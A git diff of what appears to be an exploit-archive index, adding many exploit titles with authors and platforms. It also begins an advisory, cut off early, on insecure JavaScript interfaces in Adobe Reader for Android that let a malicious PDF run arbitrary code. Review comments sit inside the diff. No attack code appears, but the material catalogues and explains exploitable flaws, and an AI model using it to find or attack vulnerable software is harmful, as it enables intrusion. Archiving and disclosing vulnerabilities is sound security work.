diff --git a/files.csv b/files.csv
index c9e27942e..d5a18f600 100755
--- a/files.csv
+++ b/files.csv
@@ -8181,7 +8181,7 @@ id,file,description,date,author,platform,type,port
8675,platforms/php/webapps/8675.txt,"Ascad Networks 5 Products Insecure Cookie Handling Vulnerability",2009-05-14,G4N0K,php,webapps,0
8676,platforms/php/webapps/8676.txt,"My Game Script 2.0 (Auth Bypass) SQL Injection Vulnerability",2009-05-14,"ThE g0bL!N",php,webapps,0
8677,platforms/windows/dos/8677.txt,"DigiMode Maya 1.0.2 (.m3u / .m3l files) Buffer Overflow PoCs",2009-05-14,SirGod,windows,dos,0
-8678,platforms/linux/local/8678.c,"Linux Kernel 2.6.29 ptrace_attach() Local Root Race Condition Exploit",2009-05-14,prdelka,linux,local,0
+8678,platforms/linux/local/8678.c,"Linux Kernel 2.6.29 - ptrace_attach() Local Root Race Condition Exploit",2009-05-14,prdelka,linux,local,0
8679,platforms/php/webapps/8679.txt,"Shutter 0.1.1 - Multiple Remote SQL Injection Vulnerabilities",2009-05-14,YEnH4ckEr,php,webapps,0
8680,platforms/php/webapps/8680.txt,"beLive 0.2.3 (arch.php arch) - Local File Inclusion Vulnerability",2009-05-14,Kacper,php,webapps,0
8681,platforms/php/webapps/8681.php,"StrawBerry 1.1.1 LFI / Remote Command Execution Exploit",2009-05-14,[AVT],php,webapps,0
@@ -16149,7 +16149,7 @@ id,file,description,date,author,platform,type,port
18690,platforms/php/webapps/18690.txt,"Buddypress plugin of Wordpress remote SQL Injection",2012-03-31,"Ivan Terkin",php,webapps,0
18691,platforms/windows/dos/18691.rb,"FoxPlayer 2.6.0 - Denial of Service",2012-04-01,"Ahmed Elhady Mohamed",windows,dos,0
18692,platforms/linux/dos/18692.rb,"SnackAmp 3.1.3 - (.aiff) Denial of Service",2012-04-01,"Ahmed Elhady Mohamed",linux,dos,0
-18693,platforms/windows/local/18693.py,"BlazeVideo HDTV Player 6.6 Professional SEH&DEP&ASLR",2012-04-03,b33f,windows,local,0
+18693,platforms/windows/local/18693.py,"BlazeVideo HDTV Player 6.6 Professional - SEH&DEP&ASLR",2012-04-03,b33f,windows,local,0
18694,platforms/php/webapps/18694.txt,"Simple PHP Agenda <= 2.2.8 CSRF (Add Admin - Add Event)",2012-04-03,"Ivano Binetti",php,webapps,0
18695,platforms/windows/remote/18695.py,"sysax <= 5.57 - Directory Traversal",2012-04-03,"Craig Freyman",windows,remote,0
18697,platforms/windows/remote/18697.rb,"NetOp Remote Control Client 9.5 - Buffer Overflow',",2012-04-04,metasploit,windows,remote,0
@@ -22008,7 +22008,7 @@ id,file,description,date,author,platform,type,port
24869,platforms/php/webapps/24869.txt,"AContent 1.3 - Local File Inclusion",2013-03-22,DaOne,php,webapps,0
24870,platforms/php/webapps/24870.txt,"Flatnux CMS 2013-01.17 (index.php, theme param) - Local File Inclusion",2013-03-22,DaOne,php,webapps,0
24871,platforms/php/webapps/24871.txt,"Slash CMS - Multiple Vulnerabilities",2013-03-22,DaOne,php,webapps,0
-24872,platforms/windows/local/24872.txt,"Photodex ProShow Producer 5.0.3310 ScsiAccess - Local Privilege Escalation",2013-03-22,"Julien Ahrens",windows,local,0
+24872,platforms/windows/local/24872.txt,"Photodex ProShow Gold/Producer 5.0.3310 & 6.0.3410 - ScsiAccess Local Privilege Escalation",2013-03-22,"Julien Ahrens",windows,local,0
24873,platforms/php/webapps/24873.txt,"Stradus CMS 1.0beta4 - Multiple Vulnerabilities",2013-03-22,DaOne,php,webapps,0
24874,platforms/multiple/remote/24874.rb,"Apache Struts ParametersInterceptor Remote Code Execution",2013-03-22,metasploit,multiple,remote,0
24875,platforms/windows/remote/24875.rb,"Sami FTP Server LIST Command Buffer Overflow",2013-03-22,metasploit,windows,remote,0
@@ -29470,7 +29470,7 @@ id,file,description,date,author,platform,type,port
32703,platforms/ios/webapps/32703.txt,"Private Photo+Video 1.1 Pro iOS - Persistent Vulnerability",2014-04-05,Vulnerability-Lab,ios,webapps,0
32704,platforms/windows/dos/32704.pl,"MA Lighting Technology grandMA onPC 6.808 - Remote Denial of Service (DOS) Vulnerability",2014-04-05,LiquidWorm,windows,dos,0
32705,platforms/windows/dos/32705.py,"EagleGet 1.1.8.1 - Denial of Service Exploit",2014-04-06,"Interference Security",windows,dos,0
-32706,platforms/windows/dos/32706.txt,"Notepad++ DSpellCheck 1.2.12.0 - Denial of Service",2014-04-06,sajith,windows,dos,0
+32706,platforms/windows/dos/32706.txt,"Notepad++ DSpellCheck v1.2.12.0 - Denial of Service",2014-04-06,sajith,windows,dos,0
32707,platforms/windows/dos/32707.txt,"InfraRecorder 0.53 - Memory Corruption [Denial of Service]",2014-04-06,sajith,windows,dos,0
32708,platforms/jsp/webapps/32708.txt,"Plunet BusinessManager 4.1 pagesUTF8/auftrag_allgemeinauftrag.jsp Multiple Parameter XSS",2009-01-07,"Matteo Ignaccolo",jsp,webapps,0
32709,platforms/jsp/webapps/32709.txt,"Plunet BusinessManager 4.1 pagesUTF8/Sys_DirAnzeige.jsp Pfad Parameter Direct Request Information Disclosure",2009-01-07,"Matteo Ignaccolo",jsp,webapps,0
@@ -29483,7 +29483,7 @@ id,file,description,date,author,platform,type,port
32716,platforms/asp/webapps/32716.html,"Comersus Cart 6 User Email and User Password Unauthorized Access Vulnerability",2009-01-12,ajann,asp,webapps,0
32717,platforms/php/webapps/32717.pl,"Simple Machines Forum <= 1.1.5 Password Reset Security Bypass Vulnerability",2009-01-12,Xianur0,php,webapps,0
32718,platforms/php/webapps/32718.txt,"Ovidentia 6.7.5 'index.php' Multiple Cross-Site Scripting Vulnerabilities",2009-01-12,"Ivan Sanchez",php,webapps,0
-32721,platforms/php/webapps/32721.txt,"XAMPP 3.2.1 & phpMyAdmin 4.1.6 - Multiple Vulnerabilities",2014-04-07,"Mayank Kapoor",php,webapps,0
+32721,platforms/php/webapps/32721.txt,"XAMPP 3.2.1 & phpMyAdmin 4.1.6 - Multiple Vulnerabilities",2014-04-07,hackerDesk,php,webapps,0
32723,platforms/hardware/remote/32723.txt,"Cisco IOS 12.x HTTP Server Multiple Cross Site Scripting Vulnerabilities",2009-01-14,"Adrian Pastor",hardware,remote,0
32724,platforms/php/webapps/32724.txt,"Dark Age CMS 2.0 'login.php' SQL Injection Vulnerability",2009-01-14,darkjoker,php,webapps,0
32725,platforms/windows/remote/32725.rb,"JIRA Issues Collector Directory Traversal",2014-04-07,metasploit,windows,remote,8080
@@ -29530,9 +29530,11 @@ id,file,description,date,author,platform,type,port
32768,platforms/cgi/webapps/32768.pl,"PerlSoft Gästebuch Version: 1.7b 'admincenter.cgi' Remote Command Execution Vulnerability",2009-01-29,Perforin,cgi,webapps,0
32769,platforms/php/remote/32769.php,"PHP 5.2.5 'mbstring.func_overload' Webserver Denial Of Service Vulnerability",2009-01-30,strategma,php,remote,0
32770,platforms/php/webapps/32770.txt,"E-Php B2B Trading Marketplace Script Multiple Cross Site Scripting Vulnerabilities",2009-01-30,SaiedHacker,php,webapps,0
+32771,platforms/windows/local/32771.txt,"Multiple Kaspersky Products 'klim5.sys' - Local Privilege Escalation Vulnerability",2009-02-02,"Ruben Santamarta ",windows,local,0
32772,platforms/windows/dos/32772.py,"Nokia Multimedia Player 1.1 '.m3u' File Heap Buffer Overflow Vulnerability",2009-02-03,zer0in,windows,dos,0
32773,platforms/php/webapps/32773.txt,"Simple Machines Forum <= 1.1.7 '[url]' Tag HTML Injection Vulnerability",2009-02-03,Xianur0,php,webapps,0
32774,platforms/multiple/dos/32774.txt,"QIP 2005 Malformed Rich Text Message Remote Denial of Service Vulnerability",2009-02-04,ShineShadow,multiple,dos,0
+32775,platforms/linux/dos/32775.txt,"Linux Kernel 2.6.x - 'make_indexed_dir()' Local Denial of Service Vulnerability",2009-02-16,"Sami Liedes",linux,dos,0
32776,platforms/hardware/remote/32776.txt,"Cisco IOS 12.4(23) HTTP Server Multiple Cross Site Scripting Vulnerabilities",2009-02-04,Zloss,hardware,remote,0
32777,platforms/php/webapps/32777.html,"MetaBBS 0.11 Administration Settings Authentication Bypass Vulnerability",2009-02-04,make0day,php,webapps,0
32778,platforms/windows/local/32778.pl,"Password Door 8.4 Local Buffer Overflow Vulnerability",2009-02-05,b3hz4d,windows,local,0
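Review bot: The author field of the added 32771 row carries a trailing space, `"Ruben Santamarta "`, which makes it a distinct value from an unpadded spelling of the same name for anything that groups, deduplicates or searches the index by author. Trim it so the row reads `32771,platforms/windows/local/32771.txt,"Multiple Kaspersky Products 'klim5.sys' - Local Privilege Escalation Vulnerability",2009-02-02,"Ruben Santamarta",windows,local,0`. The surrounding quotes are still required after trimming because the name contains an inner space.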
@@ -29545,7 +29547,7 @@ id,file,description,date,author,platform,type,port
32785,platforms/php/webapps/32785.txt,"Bitrix Site Manager 6/7 Multiple Input Validation Vulnerabilities",2009-02-09,aGGreSSor,php,webapps,0
32789,platforms/unix/remote/32789.rb,"Sophos Web Protection Appliance Interface Authenticated Arbitrary Command Execution",2014-04-10,metasploit,unix,remote,443
32790,platforms/php/webapps/32790.txt,"XCloner Standalone 3.5 - CSRF Vulnerability",2014-04-10,"High-Tech Bridge SA",php,webapps,80
-32791,platforms/multiple/remote/32791.c,"Heartbleed OpenSSL Information Leak Exploit",2014-04-10,prdelka,multiple,remote,443
+32791,platforms/multiple/remote/32791.c,"Heartbleed OpenSSL - Information Leak Exploit",2014-04-10,prdelka,multiple,remote,443
32792,platforms/php/webapps/32792.txt,"Orbit Open Ad Server 1.1.0 - SQL Injection",2014-04-10,"High-Tech Bridge SA",php,webapps,80
32793,platforms/windows/local/32793.rb,"MS14-017 Microsoft Word RTF Object Confusion",2014-04-10,metasploit,windows,local,0
32794,platforms/php/remote/32794.rb,"Vtiger Install Unauthenticated Remote Command Execution",2014-04-10,metasploit,php,remote,80
@@ -29554,9 +29556,113 @@ id,file,description,date,author,platform,type,port
32797,platforms/asp/webapps/32797.txt,"Banking@Home 2.1 'Login.asp' Multiple SQL Injection Vulnerabilities",2009-02-10,"Francesco Bianchino",asp,webapps,0
32798,platforms/multiple/remote/32798.pl,"ProFTPD 1.3 'mod_sql' Username SQL Injection Vulnerability",2009-02-10,AlpHaNiX,multiple,remote,0
32799,platforms/windows/remote/32799.html,"Nokia Phoenix 2008.4.7 Service Software ActiveX Controls Multiple Buffer Overflow Vulnerabilities",2009-02-10,MurderSkillz,windows,remote,0
+32800,platforms/linux/dos/32800.txt,"Poppler 0.10.3 - Multiple Denial of Service Vulnerabilities",2009-02-12,Romario,linux,dos,0
32801,platforms/hardware/remote/32801.txt,"Barracuda Load Balancer 'realm' Parameter Cross Site Scripting Vulnerability",2009-02-05,"Jan Skovgren",hardware,remote,0
32802,platforms/php/webapps/32802.txt,"ClipBucket 1.7 'dwnld.php' Directory Traversal Vulnerability",2009-02-16,JIKO,php,webapps,0
32803,platforms/php/webapps/32803.txt,"A4Desk Event Calendar 'eventid' Parameter SQL Injection Vulnerability",2008-10-01,r45c4l,php,webapps,0
32804,platforms/php/webapps/32804.txt,"lastRSS autoposting bot MOD 0.1.3 'phpbb_root_path' Parameter Remote File Include Vulnerability",2009-02-20,Kacper,php,webapps,0
32805,platforms/linux/local/32805.c,"Linux Kernel 2.6.x 'sock.c' SO_BSDCOMPAT Option Information Disclosure Vulnerability",2009-02-20,"Clément Lecigne",linux,local,0
32806,platforms/php/webapps/32806.txt,"Blue Utopia 'index.php' Local File Include Vulnerability",2009-02-22,PLATEN,php,webapps,0
+32807,platforms/php/webapps/32807.txt,"Joomla! and Mambo gigCalendar Component 1.0 'banddetails.php' SQL Injection Vulnerability",2009-02-23,"Salvatore Fresta",php,webapps,0
+32808,platforms/php/webapps/32808.txt,"Magento 1.2 app/code/core/Mage/Admin/Model/Session.php login[username] Parameter XSS",2009-02-24,"Loukas Kalenderidis",php,webapps,0
+32809,platforms/php/webapps/32809.txt,"Magento 1.2 app/code/core/Mage/Adminhtml/controllers/IndexController.php email Parameter XSS",2009-02-24,"Loukas Kalenderidis",php,webapps,0
+32810,platforms/php/webapps/32810.txt,"Magento 1.2 downloader/index.php URL XSS",2009-02-24,"Loukas Kalenderidis",php,webapps,0
+32811,platforms/unix/remote/32811.txt,"Adobe Flash Player 9/10 - Invalid Object Reference Remote Code Execution Vulnerability",2009-02-24,"Javier Vicente Vallejo",unix,remote,0
+32813,platforms/osx/local/32813.c,"Apple Mac OS X Lion Kernel <= xnu-1699.32.7 except xnu-1699.24.8 NFS Mount - Privilege Escalation Exploit",2014-04-11,"Kenzley Alphonse",osx,local,0
+32814,platforms/php/webapps/32814.txt,"Sendy 1.1.9.1 - SQL Injection Vulnerability",2014-04-11,delme,php,webapps,0
+32815,platforms/linux/local/32815.c,"Linux Kernel 2.6.x Cloned Process 'CLONE_PARENT' Local Origin Validation Weakness",2009-02-25,"Chris Evans",linux,local,0
+32816,platforms/php/webapps/32816.txt,"Orooj CMS 'news.php' SQL Injection Vulnerability",2009-02-25,Cru3l.b0y,php,webapps,0
+32817,platforms/osx/dos/32817.txt,"Apple Safari 4 Malformed 'feeds:' URI Null Pointer Dereference Remote Denial Of Service Vulnerability",2009-02-25,Trancer,osx,dos,0
+32818,platforms/java/webapps/32818.txt,"JOnAS 4.10.3 'select' Parameter Error Page Cross Site Scripting Vulnerability",2009-02-25,"Digital Security Research Group",java,webapps,0
+32819,platforms/php/webapps/32819.txt,"Parsi PHP CMS 2.0 'index.php' SQL Injection Vulnerability",2009-02-26,Cru3l.b0y,php,webapps,0
+32820,platforms/linux/local/32820.txt,"OpenSC 0.11.x PKCS#11 Implementation Unauthorized Access Vulnerability",2009-02-26,"Andreas Jellinghaus",linux,local,0
+32821,platforms/java/webapps/32821.html,"APC PowerChute Network Shutdown HTTP Response Splitting and Cross Site Scripting Vulnerabilities",2009-02-26,"Digital Security Research Group",java,webapps,0
+32823,platforms/php/webapps/32823.txt,"Irokez Blog 0.7.3.2 Multiple Input Validation Vulnerabilities",2009-02-27,Corwin,php,webapps,0
+32824,platforms/windows/dos/32824.pl,"Internet Download Manager 5.15 Build 3 Language File Parsing Buffer Overflow Vulnerability",2009-02-27,"musashi karak0rsan",windows,dos,0
+32825,platforms/linux/remote/32825.txt,"djbdns 1.05 Long Response Packet Remote Cache Poisoning Vulnerability",2009-02-27,"Matthew Dempsky",linux,remote,0
+32826,platforms/windows/remote/32826.html,"iDefense COMRaider Active X Control 'write()' Arbitrary File Overwrite Vulnerability",2009-03-02,"Amir Zangeneh",windows,remote,0
+32827,platforms/php/webapps/32827.txt,"Afian 'includer.php' Directory Traversal Vulnerability",2009-03-02,vnbrain.net,php,webapps,0
+32828,platforms/php/webapps/32828.txt,"Yektaweb Academic Web Tools CMS 1.4.2.8/1.5.7 Multiple Cross Site Scripting Vulnerabilities",2009-03-02,Isfahan,php,webapps,0
+32829,platforms/linux/local/32829.c,"Linux Kernel 2.6.x 'seccomp' System Call Security Bypass Vulnerability",2009-03-02,"Chris Evans",linux,local,0
+32830,platforms/php/webapps/32830.txt,"CubeCart 5.2.8 - Session Fixation",2014-04-13,absane,php,webapps,0
+32831,platforms/php/webapps/32831.txt,"Microweber CMS 0.93 - CSRF Vulnerability",2014-04-13,sajith,php,webapps,0
+32832,platforms/windows/remote/32832.c,"NovaStor NovaNET 12 'DtbClsLogin()' Remote Stack Buffer Overflow Vulnerability",2009-03-02,"AbdulAziz Hariri",windows,remote,0
+32833,platforms/asp/webapps/32833.txt,"Blogsa 1.0 'Widgets.aspx' Cross Site Scripting Vulnerability",2009-03-02,DJR,asp,webapps,0
+32834,platforms/linux/remote/32834.txt,"cURL/libcURL <= 7.19.3 HTTP 'Location:' Redirect Security Bypass Vulnerability",2009-03-03,"David Kierznowski",linux,remote,0
+32835,platforms/php/webapps/32835.txt,"NovaBoard 1.0 HTML Injection and Cross-Site Scripting Vulnerabilities",2009-03-03,"Jose Luis Zayas",php,webapps,0
+32836,platforms/multiple/dos/32836.html,"Mozilla Firefox 2.0.x Nested 'window.print()' Denial of Service Vulnerability",2009-03-03,b3hz4d,multiple,dos,0
+32837,platforms/linux/remote/32837.py,"Wesnoth 1.x PythonAI Remote Code Execution Vulnerability",2009-02-25,Wesnoth,linux,remote,0
+32838,platforms/linux/dos/32838.txt,"MySQL <= 6.0.9 XPath Expression Remote Denial Of Service Vulnerability",2009-02-14,"Shane Bester",linux,dos,0
+32839,platforms/multiple/remote/32839.txt,"IBM WebSphere Application Server 6.1/7.0 Administrative Console Cross Site Scripting Vulnerability",2009-02-26,IBM,multiple,remote,0
+32840,platforms/php/webapps/32840.txt,"Amoot Web Directory Password Field SQL Injection Vulnerability",2009-03-05,Pouya_Server,php,webapps,0
+32841,platforms/php/webapps/32841.txt,"CMSCart 1.04 'maindatafunctions.php' SQL Injection Vulnerability",2009-02-28,"John Martinelli",php,webapps,0
+32842,platforms/php/webapps/32842.txt,"UMI CMS 2.7 'fields_filter' Parameter Cross Site Scripting Vulnerability",2009-03-06,"Dmitriy Evteev",php,webapps,0
+32843,platforms/php/webapps/32843.txt,"TinX CMS 3.5 'rss.php' SQL Injection Vulnerability",2009-03-06,"Dmitriy Evteev",php,webapps,0
+32844,platforms/php/webapps/32844.txt,"PHORTAIL 1.2.1 'poster.php' Multiple HTML Injection Vulnerabilities",2009-03-09,"Jonathan Salwan",php,webapps,0
+32845,platforms/windows/local/32845.pl,"IBM Director 5.20 CIM Server Privilege Escalation Vulnerability",2009-03-10,"Bernhard Mueller",windows,local,0
+32846,platforms/php/webapps/32846.txt,"Nenriki CMS 0.5 'ID' Cookie SQL Injection Vulnerability",2009-03-10,x0r,php,webapps,0
+32847,platforms/multiple/local/32847.txt,"PostgreSQL 8.3.6 Low Cost Function Information Disclosure Vulnerability",2009-03-10,"Andres Freund",multiple,local,0
+32848,platforms/linux/local/32848.txt,"Sun xVM VirtualBox 2.0/2.1 Local Privilege Escalation Vulnerability",2009-03-10,"Sun Microsystems",linux,local,0
+32849,platforms/linux/dos/32849.txt,"PostgreSQL <= 8.3.6 Conversion Encoding Remote Denial of Service Vulnerability",2009-03-11,"Afonin Denis",linux,dos,0
+32850,platforms/windows/local/32850.txt,"Multiple SlySoft Products - Driver IOCTL Request Multiple Local Buffer Overflow Vulnerabilities",2009-03-12,"Nikita Tarakanov",windows,local,0
+32851,platforms/windows/remote/32851.html,"MS14-012 Internet Explorer CMarkup Use-After-Free",2014-04-14,"Jean-Jamil Khalife",windows,remote,0
+32852,platforms/php/webapps/32852.txt,"TikiWiki 2.2/3.0 'tiki-galleries.php' Cross Site Scripting Vulnerability",2009-03-12,iliz,php,webapps,0
+32853,platforms/php/webapps/32853.txt,"TikiWiki 2.2/3.0 'tiki-list_file_gallery.php' Cross Site Scripting Vulnerability",2009-03-12,iliz,php,webapps,0
+32854,platforms/php/webapps/32854.txt,"TikiWiki 2.2/3.0 'tiki-listpages.php' Cross Site Scripting Vulnerability",2009-03-12,iliz,php,webapps,0
+32856,platforms/linux/dos/32856.txt,"MPlayer Malformed AAC File Handling DoS",2008-10-07,"Hanno Bock",linux,dos,0
+32857,platforms/linux/dos/32857.txt,"MPlayer Malformed OGM File Handling DoS",2008-10-07,"Hanno Bock",linux,dos,0
+32858,platforms/java/webapps/32858.txt,"Sun Java System Messenger Express 6.3-0.15 'error' Parameter Cross-Site Scripting Vulnerability",2009-03-17,syniack,java,webapps,0
+32859,platforms/hardware/webapps/32859.txt,"Sagem Fast 3304-V2 - Authentification Bypass",2014-04-14,"Yassin Aboukir",hardware,webapps,0
+32860,platforms/java/dos/32860.txt,"Sun Java System Calendar Server 6.3 Duplicate URI Request Denial of Service Vulnerability",2009-03-31,"SCS team",java,dos,0
+32861,platforms/php/webapps/32861.txt,"WordPress Theme LineNity 1.20 - Local File Inclusion",2014-04-14,"felipe andrian",php,webapps,0
+32862,platforms/java/webapps/32862.txt,"Sun Java System Calendar Server 6 'command.shtml' Cross Site Scripting Vulnerability",2009-03-31,"SCS team",java,webapps,0
+32863,platforms/java/webapps/32863.txt,"Sun Java System Communications Express 6.3 'search.xml' Cross Site Scripting Vulnerability",2009-05-20,"SCS team",java,webapps,0
+32864,platforms/java/webapps/32864.txt,"Sun Java System Communications Express 6.3 'UWCMain' Cross Site Scripting Vulnerability",2009-05-20,"SCS team",java,webapps,0
+32865,platforms/multiple/dos/32865.py,"WhatsApp < v2.11.7 - Remote Crash",2014-04-14,"Jaime Sánchez",multiple,dos,0
+32866,platforms/ios/webapps/32866.txt,"PDF Album v1.7 iOS - File Include Web Vulnerability",2014-04-14,Vulnerability-Lab,ios,webapps,0
+32867,platforms/php/webapps/32867.txt,"Wordpress Quick Page/Post Redirect Plugin 5.0.3 - Multiple Vulnerabilities",2014-04-14,"Tom Adams",php,webapps,80
+32868,platforms/php/webapps/32868.txt,"Wordpress Twitget Plugin 3.3.1 - Multiple Vulnerabilities",2014-04-14,"Tom Adams",php,webapps,80
+32869,platforms/linux/webapps/32869.rb,"eScan Web Management Console Command Injection",2014-04-14,metasploit,linux,webapps,10080
+32870,platforms/cgi/webapps/32870.txt,"AWStats <= 6.4 'awstats.pl' Multiple Path Disclosure Vulnerability",2009-04-19,r0t,cgi,webapps,0
+32871,platforms/php/webapps/32871.txt,"ExpressionEngine 1.6 Avtaar Name HTML Injection Vulnerability",2009-03-22,"Adam Baldwin",php,webapps,0
+32872,platforms/php/webapps/32872.txt,"PHPizabi 0.8 'notepad_body' Parameter SQL Injection Vulnerability",2009-03-24,Nine:Situations:Group::bookoo,php,webapps,0
+32873,platforms/php/webapps/32873.txt,"PHPCMS2008 'ask/search_ajax.php' SQL Injection Vulnerability",2009-03-17,anonymous,php,webapps,0
+32874,platforms/asp/webapps/32874.txt,"BlogEngine.NET 1.4 'search.aspx' Cross Site Scripting Vulnerability",2009-04-01,sk,asp,webapps,0
+32875,platforms/php/webapps/32875.txt,"Comparison Engine Power 1.0 'product.comparision.php' SQL Injection Vulnerability",2009-03-25,SirGod,php,webapps,0
+32876,platforms/novell/remote/32876.txt,"Novell NetStorage 2.0.1/3.1.5 Multiple Remote Vulnerabilities",2009-03-26,"Bugs NotHugs",novell,remote,0
+32877,platforms/multiple/remote/32877.txt,"Xlight FTP Server <= 3.2 'user' SQL Injection Vulnerability",2009-03-19,fla,multiple,remote,0
+32878,platforms/hardware/remote/32878.txt,"Cisco ASA Appliance 7.x/8.0 WebVPN Cross Site Scripting Vulnerability",2009-03-31,"Bugs NotHugs",hardware,remote,0
+32879,platforms/windows/remote/32879.html,"SAP MaxDB 7.4/7.6 'webdbm' Multiple Cross Site Scripting Vulnerabilities",2009-03-31,"Digital Security Research Group",windows,remote,0
+32880,platforms/php/webapps/32880.txt,"Turnkey eBook Store 1.1 'keywords' Parameter Cross Site Scripting Vulnerability",2009-03-31,TEAMELITE,php,webapps,0
+32881,platforms/windows/dos/32881.py,"QtWeb Browser 2.0 Malformed HTML File Remote Denial of Service Vulnerability",2009-04-01,LiquidWorm,windows,dos,0
+32882,platforms/asp/webapps/32882.txt,"SAP Business Objects Crystal Reports 7-10 'viewreport.asp' Cross Site Scripting Vulnerability",2009-04-02,"Bugs NotHugs",asp,webapps,0
+32883,platforms/hardware/webapps/32883.txt,"NETGEAR N600 WIRELESS DUAL BAND WNDR3400 - Multiple Vulnerabilities",2014-04-15,"Santhosh Kumar",hardware,webapps,8080
+32884,platforms/android/local/32884.txt,"Adobe Reader for Android 11.1.3 - Arbitrary JavaScript Execution",2014-04-15,"Yorick Koster",android,local,0
+32885,platforms/unix/remote/32885.rb,"Unitrends Enterprise Backup 7.3.0 - Unauthenticated Root RCE",2014-04-15,"Brandon Perry",unix,remote,443
+32886,platforms/hardware/webapps/32886.txt,"Xerox DocuShare - SQL Injection",2014-04-15,"Brandon Perry",hardware,webapps,8080
+32887,platforms/php/webapps/32887.txt,"osCommerce 2.2/3.0 'oscid' Session Fixation Vulnerability",2009-04-02,laurent.desaulniers,php,webapps,0
+32888,platforms/asp/webapps/32888.txt,"Asbru Web Content Management 6.5/6.6.9 SQL Injection and Cross Site Scripting Vulnerabilities",2009-04-02,"Patrick Webster",asp,webapps,0
+32889,platforms/php/webapps/32889.txt,"4CMS SQL Injection and Local File Include Vulnerabilities",2009-04-02,k1ll3r_null,php,webapps,0
+32890,platforms/unix/remote/32890.txt,"Apache mod_perl 'Apache::Status' and 'Apache2::Status' Cross Site Scripting Vulnerability",2009-04-01,"Richard H. Brain",unix,remote,0
+32891,platforms/windows/local/32891.txt,"Microsoft Windows XP/VISTA/2003/2008 - WMI Service Isolation Local Privilege Escalation Vulnerability",2009-04-14,"Cesar Cerrudo",windows,local,0
+32892,platforms/windows/local/32892.txt,"Microsoft Windows XP/2003 - RPCSS Service Isolation Local Privilege Escalation Vulnerability",2009-04-14,"Cesar Cerrudo",windows,local,0
+32893,platforms/windows/local/32893.txt,"Microsoft Windows VISTA/2008 - Thread Pool ACL Local Privilege Escalation Vulnerability",2009-04-14,"Cesar Cerrudo",windows,local,0
+32894,platforms/multiple/webapps/32894.txt,"IBM BladeCenter Advanced Management Module 1.42 Login username XSS",2009-04-09,"Henri Lindberg",multiple,webapps,0
+32895,platforms/multiple/webapps/32895.txt,"IBM BladeCenter Advanced Management Module 1.42 private/file_management.ssi PATH Parameter XSS",2009-04-09,"Henri Lindberg",multiple,webapps,0
+32896,platforms/multiple/webapps/32896.html,"IBM BladeCenter Advanced Management Module 1.42 CSRF",2009-04-09,"Henri Lindberg",multiple,webapps,0
+32897,platforms/java/webapps/32897.txt,"Cisco Subscriber Edge Services Manager Cross Site Scripting And HTML Injection Vulnerabilities",2009-04-09,"Usman Saeed",java,webapps,0
+32898,platforms/asp/webapps/32898.txt,"XIGLA Absolute Form Processor XE 1.5 'login.asp' SQL Injection Vulnerability",2009-04-09,"ThE g0bL!N",asp,webapps,0
+32901,platforms/php/local/32901.php,"PHP 5.2.9 cURL 'safe_mode' and 'open_basedir' Restriction-Bypass Vulnerability",2009-04-10,"Maksymilian Arciemowicz",php,local,0
+32902,platforms/windows/dos/32902.py,"Microsoft Internet Explorer 8 File Download Denial of Service Vulnerability",2009-04-11,"Nam Nguyen",windows,dos,0
+32903,platforms/asp/webapps/32903.txt,"People-Trak Login SQL Injection Vulnerability",2009-04-13,Mormoroth.net,asp,webapps,0
+32904,platforms/windows/remote/32904.rb,"MS14-012 Microsoft Internet Explorer CMarkup Use-After-Free",2014-04-16,metasploit,windows,remote,0
+32905,platforms/php/webapps/32905.txt,"LinPHA 1.3.2/1.3.3 login.php XSS",2009-04-09,"Gerendi Sandor Attila",php,webapps,0
+32906,platforms/php/webapps/32906.txt,"LinPHA 1.3.2/1.3.3 new_images.php XSS",2009-04-09,"Gerendi Sandor Attila",php,webapps,0
+32907,platforms/cgi/webapps/32907.txt,"Banshee 1.4.2 DAAP Extension 'apps/web/vs_diag.cgi' Cross Site Scripting Vulnerability",2009-04-13,"Anthony de Almeida Lopes",cgi,webapps,0
+32908,platforms/multiple/webapps/32908.txt,"IBM Tivoli Continuous Data Protection for Files 3.1.4.0 Cross Site Scripting Vulnerability",2009-04-14,"Abdul-Aziz Hariri",multiple,webapps,0
+32909,platforms/java/webapps/32909.txt,"Novell Teaming 1.0 User Enumeration Weakness and Multiple Cross Site Scripting Vulnerabilities",2009-04-15,"Michael Kirchner",java,webapps,0
+32910,platforms/php/webapps/32910.txt,"Phorum 5.2 admin/badwords.php curr Parameter XSS",2009-04-16,voodoo-labs,php,webapps,0
+32911,platforms/php/webapps/32911.txt,"Phorum 5.2 admin/banlist.php curr Parameter XSS",2009-04-16,voodoo-labs,php,webapps,0
+32912,platforms/php/webapps/32912.txt,"Phorum 5.2 admin/users.php Multiple Parameter XSS",2009-04-16,voodoo-labs,php,webapps,0
+32913,platforms/php/webapps/32913.txt,"Phorum 5.2 versioncheck.php upgrade_available Parameter XSS",2009-04-16,voodoo-labs,php,webapps,0
+32914,platforms/php/webapps/32914.php,"Geeklog <= 1.5.2 'usersettings.php' SQL Injection Vulnerability",2009-04-16,Nine:Situations:Group::bookoo,php,webapps,0
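Review bot: The description of the added 32859 row spells `Authentification Bypass`; the index uses `Authentication Bypass` elsewhere (for example the 32777 row two hunks above), so the line should read `32859,platforms/hardware/webapps/32859.txt,"Sagem Fast 3304-V2 - Authentication Bypass",2014-04-14,"Yassin Aboukir",hardware,webapps,0`. The added 32883 row is the only entry in this hunk with an all-caps product title, `NETGEAR N600 WIRELESS DUAL BAND WNDR3400`; if the index follows a title-casing convention it should be normalised to match, though that convention cannot be confirmed from this diff alone.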
diff --git a/platforms/android/local/32884.txt b/platforms/android/local/32884.txt
new file mode 100755
index 000000000..34c9ada96
--- /dev/null
+++ b/platforms/android/local/32884.txt
@@ -0,0 +1,120 @@
+------------------------------------------------------------------------
+Adobe Reader for Android exposes insecure Javascript interfaces
+------------------------------------------------------------------------
+Yorick Koster, April 2014
+
+------------------------------------------------------------------------
+Abstract
+------------------------------------------------------------------------
+Adobe Reader for Android [2] exposes several insecure Javascript
+interfaces. This issue can be exploited by opening a malicious PDF in
+Adobe Reader. Exploiting this issue allows for the execution of
+arbitrary Java code, which can result in a compromise of the documents
+stored in Reader and files stored on SD card.
+
+------------------------------------------------------------------------
+Tested versions
+------------------------------------------------------------------------
+This issue was successfully verified on Adobe Reader for Android
+version 11.1.3.
+
+------------------------------------------------------------------------
+Fix
+------------------------------------------------------------------------
+Adobe released version 11.2.0 of Adobe Reader that add
+@JavascriptInterface [3] annotations to public methods that should be
+exposed in the Javascript interfaces. In addition, the app now targets
+API Level 17 and contains a static method
+(shouldInitializeJavaScript()) that is used to check the device's
+Android version.
+
+http://www.securify.nl/advisory/SFY20140401/reader_11.2.0_release_notes.png
+Figure 1: Adobe Reader for Android 11.2.0 release notes
+
+------------------------------------------------------------------------
